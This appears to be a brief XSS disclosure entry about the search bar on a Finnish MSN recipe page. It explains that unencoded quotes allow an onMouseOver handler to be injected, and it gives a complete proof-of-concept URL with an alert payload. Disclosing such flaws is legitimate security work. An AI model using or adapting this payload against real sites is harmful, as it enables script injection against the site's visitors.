Finland MSN XSS Vulnerability

XSS1380

Overview

The search bar on this page fails to encode the quotes (") and as a result a onMouseOver event tag can be attached to the search bar which allows an XSS attack to occur.

Finland MSN XSS Vulnerability

Code:

http://ideakeittio.fi.msn.com/ruokaohjehaku/
?q=" onMouseOver=alert(/XSS/) "
&mealtypes=suolaiset
&mealtypes=leivonta-2
&main_ingredient=1

Leave a comment

(required)(will not be published)(required)

Comments

There are no comments yet. Be the first to add one!